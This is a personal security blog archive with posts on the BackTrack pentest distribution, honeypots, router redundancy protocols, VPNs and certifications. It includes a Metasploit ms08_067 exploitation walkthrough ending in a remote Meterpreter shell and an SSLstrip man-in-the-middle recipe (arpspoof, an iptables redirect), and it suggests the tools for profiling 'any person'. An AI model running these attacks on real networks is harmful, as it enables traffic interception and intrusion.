Category Archives: security

Back Track 5 r3 a BOx or a BOmb. The security suite.

  1. Back Track 5 r3 a BOx or a BOmb. The security suite.
  2. Since it was started in 2006, Back Track has become one of the best security suites in penetration testing market. Due to that fact, there has been a huge proliferation of this kind of software in the last few years.

In this article we are going to cover how a bunch of software  could be as easy as pie, or a dangerous game that could get you into trouble. On one side, installation is pretty easy (even in a virtual machine, you can easily run a security distribution). On the other side, the management and mastering is in a completely different league.

We have in front of us a Linux OS with more than 300 penetration tools.

  1. This article will help you to open the box. What can you do with a box? Not so much or maybe nothing. But with the content of the box, you could probably do a lot of things, even more if we are talking about a big box with hundreds of boxes inside. I must tell you to be careful, because depending on the use, the content can be as bad as nitroglycerin. Regardless, it is not necessary to say that, in some countries, the use of this tools can be considered as  terrorism.

When used in the right way, we can have a great security tool which will be able to help in several different areas (wifi, forensics….). With the right knowledge on each area the power multiplies 10 times.

If you use it wrongly, you can have serious problems. That said, it will be your own responsibility once you start BackTrack.

After you read this article, you would be able to run a security suite and use a couple of applications. My opinion is that the information here displayed is enough to get you hooked and with some hunger for knowledge. I think like this, mainly because I will give you a few tips to get information from the system you want to audit 😉 and I say a small part because it is quite difficult to talk about more than the 300 tools that are a part of Back Track. Inside security, there are also different fields that we could talk about, and talk a lot by the way.

  1.   I still remember the time, several years ago, when I discovered this tool. It was Back Track 2 at that time. I was using a new DELL laptop with 2 Gb RAM , 1,6 Ghz intel processor and a nvidia graphic card. It took me at least 3 days to sniff a simple packet because of my wifi chipset version and another extra day to inject traffic. I didn´t have internet at home because I was living abroad and I had to go to a local cybercafe.

Let´s start from the beginning. The current version is BackTrack 5 r3. I recommend to download the iso image from  http://www.backtrack-linux.org/. Since this is an Ubuntu version modified, Ubuntu 4.4.3. to be more accurate, you can run it even in a smart phone.

Once the iso is in your hands, you have 3 options:

  • Install it in your hard drive. Highly recommended for professionals.
  • Install it in a USB or DVD (With the proliferation of the USB devices, it does not make any sense but it is a possibility ) to run a live version. It is also a good option if you do not want to change anything in your computer. But I would recommend that, once you run your live image, you must make your changes permanent in your USB, because the next time you run it, you should change the features. And that  is not so funny.
  • Virtualization. The best and quick option to play with. This option offers you the possibility to install or even run the live ISO image in a virtual machine. It is the easiest  way to start using it. You could run a lot of virtual machines with only a PC, depending of the features and characteristics of your equipment. With a computer and a couple of virtualized machines you can play to protect a box and attack the other one. It is funny if you are into it and you could spend lots of hours 🙂

First steps:

After booting the system, you can see the following message:

Figure 1. Boot

Figure 1 – Boot

Type intro and you will enter in the main boot menu. There are 3 different modes:

-Stealth

-Forensics

-Text (this one is the default option)

Figure 2. Back Track Menu

Figure 2 – Back Track menu

The main objective of this article is to speak only about the first boot option that is “Text mode”, so you can get to know it better. Let´s say that I jump quickly into graphic mode, basically because that’s the easiest way in most of the cases, and because it is a more friendly environment. I must also say that to reach excellence in Back Track, you need to be fair good in text mode and know it very well. That is the same as saying “if you want to run, you should start to walk first”.

Following with the instructions, once you press “BackTrackText” the screen will show:

Figure 3. Prompt

Figure 3 – Login

When the “bt login” appears, it means that you are already in Text mode. The following are the credentials to log into the system.

user root
password toor(the one used in last back track distributions)

Figure 4. Prompt2

 

Figure 4 – Command line

When you type the default credentials, you will see the prompt that is showed above. From here the race will begin! You can start to play now. So far, at this point, we have crossed the line. Everything is ready!

You can start applications in text mode (Tcpdump, netcat, nmap… ). Also, as in every linux distribution, with Alt + Function keys you can move to different terminals.

To run the graphical environment, just type:

root@bt:~# startx

Once you are in the main window, go to Applications > BackTrack. You will now see the whole areas that BackTrack is covering:

Figure 5. Xwindow

Figure 5 – Back Track Xwindow

From now on, it depends on preferences. As you can see in the previous image, there are different areas to explore:

  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress Testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscelaneous

As a good expert, before any attack, you need to know your “victim” right? I believe that it is sensible to start with Information Gathering Tools. You would need to get as much information as possible to find the best vector attacks. Personally, one of my favorite tools  for recognition jobs  is Maltego. The Paterva guys are doing a very well job on this area.  With a graphic interface, they make it easy for a program to start getting information from a simple domain record. With this tools you would simplify your work, avoiding getting locks in Text mode and parsing to draft the final report. It is quite complete and there even is the possibility to add plugins.

Believe me, this tool is fantastic.Let me tell you that, as a security consultant, it helps a lot to use Maltego. To be honest, as a consultant, the whole Suite is a mandatory tool to have.  It is like an all-in-one. I do not need to say that a good professional use to have every tool personalized and this is also the case. Back Track is running under a Linux distribution or, even better, it is a Linux distribution already modified for security experts. Then, once you are provided with the ultimate Back Track tool, you may start to tune it to fulfill your own necessities.

You also have wine  installed by default to emulate any windows application in a Linux machine.

ü  Let´s talk now about Maltego. It comes to my mind a previous version (version 2) in which you were not asked to log in as in this new one. This has been made probably  to provide better features.

How can we use it then? Where should I start? Once you open it up, the picture that is showed next (figuere 6) is the first screen you would see:

Figure 6. Maltego

Figure 6 – Maltego

The first option that you may check is the Manage > Manage Transforms. This is an important one and the real engine that would help you establish the parameters of how Maltego will work later on. A good transform will lead you to achieve a best result.

Figure 10. Transform manager

Figure 7 – Transform manager

You can create your own transforms, personalized in order to your necessities, or you can also modify the ones that are in the system by default. You also need to accept each transform disclaimer, unless you want to accept every time you do a transform. You can sort them by Status and accept the ones in “disclamer not accepted” status. After you fine tune your transformations, you are ready to start using Maltego.

As some ways to see the information, you have Main View, Bubble View and Entity List View. By default, Main View is the one that will be selected. The differences are in how data are represented (with icons in the main view, with bubbles in the bubbles view and also as a list). The default view starts the same as in Figure 6. Let´s see the options. On the left side, there are the objects which you can drag and drop into the Main View. On the right side you see some other windows that will be empty until you select an icon. Starting from the left and selecting “Domain”, for example, you already have the first piece of the game. I did a test with the default feature that is paterva.com. Of course that you can change anything to whatever domain name that you want, and do the same for each object. Clicking on it or even passing the mouse over it, you have a detailed view and also a property view in the right side of the main window. With an object, there is not so much that we can do. Let´s go on! Now you click with the right button of the mouse on the domain “Run Transform” -> “All transforms” and that´s the result:

Figure 13. Run - Transform - finished

Figure 8 – Transformation finished

As you can see, there is  a lot of “rubbish”. In this case, if you visit paterva.com, you´ll notice that at the end of the website, there are some social network icons and that is why you see facebook, twitter, youtube… in your schema. This is the same for phones and some other objects. For that reason, discard all the icons that are not giving you any interesting information. And you can continue with each icon doing transforms until you get the final picture as well.

When you clik on “Running transforms” this is what Maltego is doing in the “background” to finally draw the final  picture.

Figure 12. Output - Transform

Figure 9 – Transform output

The best idea is to check only the important transformations or even better if you ask me,  disable the ones not needed and create personalized ones. As I said before, the first clicks you may do after start Maltego is Manage > Manage Transforms.

ü  Another interesting tool that we can talk about is Etherape. It is not under BackTrack option in the main menu. You can find it in systems tools or in internet. This is a graphical network monitor with 5 different capture modes (Token Ring, FDDI, Ethernet, IP and TCP).You could see the connections from your host , the connections to your host, or both ways. This is, in my opinion, an easy and light tool with just a few options, but very useful.

Figure 15. Etherape preferences

Figure 10 – EtherApe – Preferences

You surely would be surprised if you run this tool after you type your favorite website.  It is like if it is alive. Every few seconds, a banner or another link in your browser is creating a connection. I did a test with http://www.facebook.com. You can also see the ips, traffic per node, traffic per protocol.

Figure 16. Etherape

Figure 11 – EtherApe

An easy and quick example that you can try is typing the ip of your own router in your browser and you´ll see that only one connection is created between you and the router. But if you type, for example, http://www.amazon.com, you will see the bigger amount of connections that are created.

Let´s assume that you are a security guy that needs to audit a “secured system”.  The first action that you may do is to change your mac address. Because you do not want to be discovered or even because you already know the physical address of a machine and you want to obfuscate. The tool used for that purpose is the one that we are going to see next, macchanger.

ü  “Macchanger”.

Figure 17. Macchanger

Figure 12 – Macchanger

As you can see in the previous screenshot of the help menu, this is an easy and useful tool, much like some of the previous ones. With a virtual machine, you could also do it but if you want to change too many times, it is worth it.

The last application which I will cover in this article is

ü  Metasploit.  This application is an Exploitation tool,  then we will find in below path(see figure 13):

Figure 18. Metasploit

Figure 13 – Metasploit path

Metasploit is a powerful framework that could be used in different fields. It is like a Back Track inside another Back Track.  I would like to start mentioning that, an important task which you should do before starting to play with, it is to update the database. The real power of this tool is in the  database, which is being continuously updated. Metasploit is “exploiting” vulnerabilities and  if you don´t have this DDBB up to date, it is like an old anti-virus not updated since 3 months ago. Maybe you have the intention to exploit a vulnerability that is already in the database  and you do not want to update, but this is not usual because the vendors and software developers are also fixing the problems as soon as possible. There are some cases in which since day “0” to the moment the problem is patched, takes longer than expected.

To understand better, let´s think about a scenario: You are a system administrator for an important company and your web server is affected by a XSS. Due to this vulnerability, a user could get a copy of your user database compromising the privacy of the employees. As a good administrator, you need to test that your application is not affected by the dangerous bug or, if it is affected, try to fix the problem. The most important thing for you is the system that you are administering. We need to know our infrastructure (software and hardware),  and also the behavior of a specific pattern.

Some concepts that should be familiar to you when you are using Metasploit are payload and exploit.  A payload is a part of a software which allows you to take control of the computer that is affected by an exploit, which we are exploiting. The most known payload is Meterpreter(we will see it in the example later on). An exploit is a program or piece of software designed to break or crash into a system through a known vulnerability.

What this software is basically doing, is to checking in a database for all kind of bugs for different platforms, software… (that´s why is so important to update first).  You can load a bug for a specific application and once it is loaded, you can attack the application with that tool. Let´s see it with an example:

1st- Update the database. As I mentioned before this is an important step. Looking at figure 13, we can see that there is an icon to update metasploit. Click on it and prepare yourself a good coffee while you wait. It will takes time.

Figure 21. Metasploit-updated

Figure 14 – Updating Metasploit

2nd – Start Metasploit. You will get a random image and at the end you will see: version, exploits, payloads….

Figure 19. Metasploit-start

Figure 15 – msf console

3rd – Find a bug in metasploit and try to use it. Just type “search”  command  plus a chain to search. In the example below we are searching for ms08  (command:”search ms08″).

Figure 21. Metasploit-bug

Figure 16 – Searching in modules

4th – Load the module. Once you have defined the exploit, type: “use” + module.

Figure 23. MSF-show_options

Figure 17 – Module loaded

Once you are in ms08_067_netapi module, you need to investigate which options you can  type.

Now, you can define your parameters with the “set” command.

  • set rhost 192.168.1.61 (this is the ip of the remote host)
  • set lhost 192.168.1.59 (our local ip)

5th – Once it is loaded run an attack to exploit the bug. When we have the parameters configured, we will type the “exploit” command and WE ARE INSIDE!!

Figure 24. Meterpreter

Figure 18 – Exploiting

Meterpreter is the payload. Invoking help, we will already see the commands to execute in the remote host.

Figure 25. Meterpreter_shell

Figure 19 – Shell in remote host

This is only a module and you could load hundreds of modules. We also could find hundreds of exploits.

Just to resume, the commands used in this article for metasploit are:

  • ./msfpro -> Start the program
  • search + “string” -> Search in the big database you need this command.
  • use + module to load  -> Load module
    • show options -> Options in the module that you previously loaded.
      • Set + option -> It defines the values
      • exploit -> It starts the exploit
  1. To cover in deep all the tools included in this distribution I should spend some months of my life or even some years.

Just to summarize, we are standing in front of a swiss army knife(a big one by the way!).

I have given you the main steps to use one of the best security suites in the world. Now it is up to you. With that amount of tools in Back Track, you can choose which one is your strong point and try to use it and do your best.  Or even you could try to investigate about other areas.

If you are an expert in networks, you can use BT. If you are a programmer, you can use BT. If you are a DDBB expert, you can use BT. If you are a security specialist, you can use BT. Even if you are not an IT expert you also can use it, to get information about any place, person or  item 😉

About Eduardo Cuthbert:
I started in networking and security in 2004. Ever since I discovered the field of Security I have been passionate about it.

Having always lived and worked in a medium size city in Spain, I decided to try and take my chances abroad. Knowing that in other countries I could develop and research, I left and found a job in Switzerland, where I am living and working currently.

I have always worked in those two fields and I consider myself a committed and focused person, so researching and learning about new developments is something essential to me. That’s why I have always looked for better ways of improving.

Through all my career I got several certifications, such as CCNP and CCSP.

I am also a cycling enthusiast.

Text: Eduardo Cuthbert González

Proof reader: Desirée Suarez González

Advertisements

Security¿?

I was thinking today about security. In the way to work I use to read a book who is talking about it. My mind is becoming paranoid. I was working before in a remote site too far away of the crowded city but now the situation is different. I am in a big city.  When I´m going for work I see a lot of people with laptops, smartphones, tablets… and I only think in security.

Are all of those devices really secured? I´d like to think that at least, the professional people  a device 100% secured. When I say secured… at least have an antivirus and  password to unlock the device or password and some kind of encryption.

I believe that all other devices of teenagers and people who is not using the technology for work is not so protected. I saw some people unlocking the screen with a code number (that is good) and also with a figure code that is not so good(basically is because if you see the telephone against the light you would see the figure).

With a simple test, you could figure out how many devices are running with a open window when I say that I´m refering with bluetooth or wireless active. I know that for most of them, it is better having conections active because they can save 5 seconds in activate(aaahhhhh!!!).

I´m remembering my ages as administrator:

Me: – (looking out of the keyboard), please type your password.

User: – I wrote my user and pass for you in a peace of paper. I´m going to  put some order here in the office.

Me: …..LOL!

Back to handy devices, there are many kind of attacks for smartphones that could be used with bad intentions. There are tons of stupid apps that people is downloading and they don´t update . This kind of apps are a good start to exploit.

Just some security advices:

  1. Put a password in your device(laptop, tablet, smartphone) to unlock. You could forget it in a public place and anyone could sniff in your personal data.
  2. Don´t save passwords. If someone get access to your device he could spend some time in ebay with your accout.
  3. If you have your passwords there, use a software to encrypt the password database.
  4. Don´t use weak passwords like…. “123456”

When you go to the bank machine, you use to hide the keyboard to avoid watchers. In same way, when you unlock your device, or you see an email try to do the same.

A good idea is using polarised covers.

:))

Back Track 4 R2

One of the best pen-test, forensic and in general security tool is Back Track.
Chronology:
February 5, 2006 ——- BackTrack v.1.0 Beta
May 26, 2006 ———— The BackTrack project released its first non-beta version (1.0).
October 13, 2006 ——- BackTrack 2 first public beta released.
November 19, 2006 —- BackTrack 2 second public beta released.
March 6, 2007 ———— BackTrack 2 final released.
December 17, 2007 —- BackTrack 3 first beta release.[5]
June 19, 2008 ———— BackTrack 3 final released.
February 11, 2009 —— BackTrack 4 first beta release. (It’s now based on Debian)
June 19, 2009 ———— BackTrack 4 pre-final release. [6]
January 9, 2010 ———- BackTrack 4 final release.
May 8, 2010 ————— BackTrack 4 R1 release
November 22, 2010 —- BackTrack 4 R2 release

My first contact with this tool was in 2007 just because I was testing(I love test new soft,hard…;) ) different security tools. I remember that first problem that I got was with the wifi card. My wireless chip was not supported in version 2. Thanks to the new version was almost ready… I could play with my laptop 😉 . It was useful in that moment.

What’s new in R2:
* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.

Back Track 4 R1

New BackTrack 4 revision 1 is available to download.

New in this version:

* New Kernel 2.6.34 to improve hardware compatibility and performance.
* Update all tools
* New tool called “dragon” who can allow the user modify BackTrack options from CML
* Add the option to change KDE environment by Fluxbox offering a faster and flowed environment.
* Implementing driver rt28xx for Alpha AWUS050NH cards.
* If you download VMware version, VMware tools are integrated.

This is the final version of BackTrack 4 R1.
Please download it and test it!!!

Direct Downloads:

ISO Version

http://www.backtrack-linux.org/download.php?fname=bt4r1

VMware version

http://www.backtrack-linux.org/download.php?fname=bt4r1vm

Torrent Downloads:

ISO Version

http://www.offensive-security.com/bt4-r1.iso.torrent

VMware version

http://www.offensive-security.com/bt4-r1-vm.tar.bz2.torrent

“Secure” Socket Layer (SSL)

Are you really sure that SSL connections are strong?. I mean, nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world’s most important VPN encryption.

There is a tool (SSL strip) that the author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie. A recognized security consultant.

Configuring SSL-Strip

1st – Configure IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2nd – Perform a Main-in-the-middle ARP attack

arpspoof -i eth0 -t VICTIM

3rd – Redirect traffic through iptables

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4th – Start SSLStrip in used port

python sslstrip.py -w archivo

Moxie’s website: http://www.thoughtcrime.org

Honeypots

Honeypot is a software or computer that simulate a vulnerable system to attract attackers. This is a sweet for hackers or people who wants to play in the illegal side. This kind of “security systems”(from now SS) are used to know attack methods, possible systems failures or solutions to that failures. I mean SS because knowing different patterns, you can shield your infrastructure to prevent this type of attacks.

A honeypot is used to distract an attacker making a system more attractive. For example, is more appealing a computer called “server” than “computer”. Is more attractive a file called “passwords” than “images”. This are two examples of thousands.

A honeypot is then used to monitor the network. When an attacker is trying to crack your system, you have an opportunity to know more about the attacker.

For all of the above, a honeypot is a prevention and detection system.

Kind of honeypots:

Depending of function:

Production: Only capture information.

Research: Capture extensive information and used to research, military, or government organizations.

Depending of interaction with attacker:

Low interaction: Emulate services. Attacker think that is cracking a system but it is a software that is emulating this service.

High interaction: Attacker interact with it totally. All is real

At the beginning this honeypots were in most of the cases too expensive physical machines. At this time a honeypot can be a virtual machine in a virtual network with a virtual ip 🙂

I will test this kind of software to post comments in future.

High availability

I am a security passionate. First I would like to think about the concept.

What does it means “high availability”?

For example:

You are responsible of a small network and you have a spare server, router, switch and some computers. This can not be considered high availability because but is not efficient. High availability will be if you have two routers configured and in case that one is broken, all traffic will be router by the other one. The administrator should receive an alarm and this broken appliance should be replaced. This can be a “basic” scenario. It will be same for servers and switches.

Best scenario could be:

*Two different internet providers.

*A pair of good routers each one with redundant power and configured with HSRP, VRRP or GLBP protocols.

*A cluster server environment to prevent a failure in the system.

*All devices should be connected to a separate power line.

*A SAI should protect the core of the company.

If finally all the above can be duplicated  in another office…. means that the information that you are handling is toooooo important 😉

I do not know if I have skipped an y concept.

This is the theory but it depends on the necessity of the company. If the company can assume an hour or a day loss service, then is not necessary all this kind of measures. However, if the company sells articles in a website each minute is important because the service is not good for the customer.

There are another extreme cases.I read a whitepapper in which the author were talking about the systems used by the military forces in aircrafts. The systems used to control this jets is best redundant example. It uses 3 different systems with 3 different architectures and 3 different operating systems. He did not talk about power but I think that is redundant too 😉

Now let’s start to talk about redundant protocols.

Hot Standby Router Protocol (HSRP). Provides default gateway redundancy using one active and one standby router. That means. A router is receiving all weight and in case of it fails, the standby router will become as active router. When the the service is established it will back to standby router as before. By multicasting packets, HSRP sends its hello messages to the multicast address 224.0.0.2 using UDP port 1985, to other HSRP-enabled routers, defining priority between the routers.The primary router with the highest configured priority will act as a virtual router with a pre-defined gateway IP and will respond to the ARP request from machines connected to the LAN with the mac address 0000.0c07.acXX where XX is the group ID in hex. If the primary router should fail, the router with the next-highest priority would take over the gateway IP and answer ARP requests with the same mac address, thus achieving transparent default gateway fail-over.

HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.

HSRP and VRRP on some routers have the ability to trigger a failover if one or more interfaces on the router go down. This can be useful for dual branch routers each with a single serial link back to the head end. If the serial link of the primary router goes down, you would want the backup router to take over the primary functionality and thus retain connectivity to the head end.

Virtual Router Redundancy Protocol (VRRP). An open-standard alternative to Cisco’s HSRP, providing the same funcionality.designed to increase the availability of the default gateway servicing hosts on the same subnet. This increased reliability is achieved by advertising a “virtual router” (an abstract representation of master and backup routers acting as a group) as a default gateway to the host(s) instead of one physical router. Two or more physical routers are then configured to stand for the virtual router, with only one doing the actual routing at any given time. If the current physical router that is routing the data on behalf of the virtual router fails, an arrangement is made for another physical router to automatically replace it. The physical router that is currently forwarding data on behalf of the virtual router is called the master router. Physical routers standing by to take over from the master router in case something goes wrong are called backup routers.

A virtual router must use 00-00-5E-00-01-XX as its Media Access Control (MAC) address. The last byte of the address (XX) is the Virtual Router IDentifier (VRID), which is different for each virtual router in the network. This address is used by only one physical router at a time, and it will reply with this MAC address when an ARP request is sent for the virtual router’s IP address. Physical routers within the virtual router must communicate within themselves using packets with multicast IP address 224.0.0.18 and IP protocol number 112.

Routers have a priority of between 1-255 and the router with the highest priority will become the master. When a planned withdrawal of a master router is to take place, its priority can be lowered which means a backup router will pre-empt the master router status rather than having to wait for the hold time to expire. This reduces the black hole period.

Gateway Load Balancing Protocol (GLBP). Supports arbitrary load balancing in addition to redundancy across gateways. It is a Cisco proprietary protocol that attempts to overcome the limitations of existing redundant router protocols by adding basic load balancing functionality.

In addition to being able to set priorities on different gateway routers, GLBP also allows a weighting parameter to be set. Based on this weighting (compared to others in the same virtual router group), ARP requests will be answered with MAC addresses pointing to different routers. Thus, load balancing is not based on traffic load, but rather on the number of hosts that will use each gateway router. By default GLBP load balances in round-robin fashion.

GLBP elects one AVG (Active Virtual Gateway) for each group. Other group members act as backup in case of AVG failure. In case there are more than two members, second best AVG is placed in the Standby state and all other members are placed in the Listening state. This is monitored using hello and holdtime timers, which are 3 and 10 seconds by default. The elected AVG then assigns a virtual MAC address to each member of the GLBP group, including itself, thus enabling AVFs (Active Virtual Forwarders). Each AVF assumes responsibility for forwarding packets sent to its virtual MAC address. There could be up to four active AVFs at the same time.

By default, GLBP routers use the local multicast address 224.0.0.102 to send hello packets to their peers every 3 seconds over UDP 3222 (source and destination).

VPN’s

There are different protocols of VPN(Virtual Private Network). The most common are PPTP, L2TP, IPSec and TLS.

PPTP

This protocol was developed by Microsoft in conjunction with other technology companies. Is the most supported by Microsoft clients. PPTP is an extension of PPP and for that reason uses same type of authentication(PAP, SPAP, CHAP,MS-CHAP, EAP). The big  problem in this protocol is that can not provide encryption. Microsoft has resolved that issue using the protocol in conjnction with MPPE(Microsoft Point-toPoint Encryption) to provide a secure VPN.

In most Microsoft operating systems can be deployed without any kind of client software installation and is available for Linux and some Mac OS versions. PPTP is supported by Cisco PIX, SonicWall and most of firewall appliances.

L2TP

Achronym means: Layer 2 Tunneling Protocol. This protocols was depveloped by Microsoft with Cisco collaboration, combining features of PPTP with those of Cisco’s propietary Layer 2 Forwarding (L2F) protocol. It can be used on non-IP networks such as ATM, frame relay and X.25. Is supported by major  firewall products like ISA Server, CheckPoint, Cisco PIX for example.

IP Security(IPSec), and Encapsulag Security Payload (ESP) protocol, provides encyption for L2TP tunnels. It requires the use of digital certificates. User authentication is performed via the same PPP authentication mechanisms as PPTP, but L2TP also provides computer authentication.

L2TP provides data integrity(protection against modification of the data between the time it left the sender and the time it reached the recipient), authentication of origin(confirmation that the user who claims to have sent the data really did), and replay protection(keeps a hacker from being able to capture data that is send, sucha as the sending of credentials, and then “replay” it to “trick” the server). On the other hand, the overhead involved in providing this extra security can result in sightly slower performance than PPTP.

This protocol does not provide any encryption or confidentiality by itself.

IPSec

As its name implies it is an IP security protocol. It encrypts and authenticates each packet. It operates at layer 3 (network) in OSI model.

This is one of the most preferred VPN protocols for site-to-site connections. Many hardware VPN appliances use an implementation of IPSec (Cisco VPN Concentrators and PIX, SonicWall, Watchguard…).

It requires that the VPN client computers have client software installed. Useful for users that are not in the office(remote users).If it is used in tunnel mode, it secures packets transmitted between two gateways. It is a normal practise in VPN’s between branch offices.

IPSec is implemented by a group of cryptographic protocols to ensure flow control, mutual authentication and stablish cryptographic parameters. The security IP arquitecture uses SA(Security Association) to set-up security functions like IKE and IKEv2(Internet Key Exchange) or KINK(Kerberized Internet Negotiation of Keys).

There are two different modes: Transport or Tunnel

Transport mode. Only payload(data sent) is encrypted or authenticated

Tunnel mode. Complete packet is enrypted or authenticated

TLS

Transport Layer Security. It is the succesor of SSL(Secure Socket Layer). It is a protocol in which you do not need additional software installed in your computer. It uses web browsers as client application.TLS provides endpoint authentication using cryptography. TLS authentication is unilateral that means: server is authenticated but not vice-versa.

When a TLS or SSL connection is established, the client and server negotiate a CipherSuite, exchanging CipherSuite codes in the client hello and server hello messages, which specifies a combination of cryptographic algorithms to be used for the connection. The key exchange and authentication algorithms are typically public key algorithms, or as in TLS-PSK preshared keys could be used. The message authentication codes are made up from cryptographic hash functions using the HMAC construction for TLS, and a non-standard pseudorandom function for SSL

I will explain IPSec and TLS protocols in separate posts.

Maltego, PenTest tool

As I said days ago, ” I will test Back Track 4″. So, I did it!

Let me tell you that I only have been testing Maltego tool. Oh my Goooooood!!!!! It´s amazing. This is a forensic and pen-test  tool.If you want to check a domain, website or whatever in a network, this tool can help you. It is graphical and you can see the evolution easily.

For example:  You want to know from outside, which information of your company people can get . This is an example:

As you can see, there are a lot of data that maybe you don´t want to be available from Internet. This is only the start 😦 because Maltego can get the following information:

* E-mail directions

* Ip addresses, even if you have more than one

* Net block

* Phone number (in case that is placed in website or another kind of document acceded from outside.

* MX record

* Location

* NX record

* Domain (you know an ip address and you want to know all domains behind this  ip)

* Documents

* People(social networks)

There is a lot of info… so, if you think that your network is safe and the people only can see your website… check this tool before 🙂

This is the user guide: http://ctas.paterva.com/view/Userguide

Once you have tested, you can get your own conclusions.

Recomended 100 %!!

Certifications

I´m going to speak about my Certification path.

I´m currently CCSP (Cisco Certified Security Professional). To achieve this certification, I have been studying around a year. I was working in a small company configuring and installing some routers, switches and another kind of network devices. I started to study the basic Cisco certification that is CCNA(Cisco Certified Network Associate). After that, I thought: “which field you would like to study?”  In that moment, I was starting to introduce myself  in security. Then, I choose CCSP because the other path, CCNP(Cisco Certified Network Professional) is related with networks and It didn´t have interest for me.

Studying this certification, I have  discovered my passion, SECURITY SYSTEMS. Before, let me explain you that “Security” cover lot of fields and if you really love it… you should choose your path. In my case Network Security Systems. That means, routers, switches, firewalls, ips, ids, sniffers, scanners…

Some people, get this certification and then think: “This is the end of my path, from now, I´m a security expert”. I´m so sorry, but it is not true. This is a part of your race. This, can be the start. In IT, you need to study every year if you want to be updated.

I´m currently studying CCNP(Cisco Certified Network Professional) and I think that in no more than 2 months I will get it! 😉

Cisco is not the only way but in my case was my start. In my opinion, if you want to be a Security Expert, you should try with:

* CISSP Certified Information Systems Security Professional

* CISA Certified Information Security Auditor

One of  these is the best path because is not focused in a technology, like Cisco, Juniper or another vendor.

There are more certifications but not so technical.

Now is your decision!.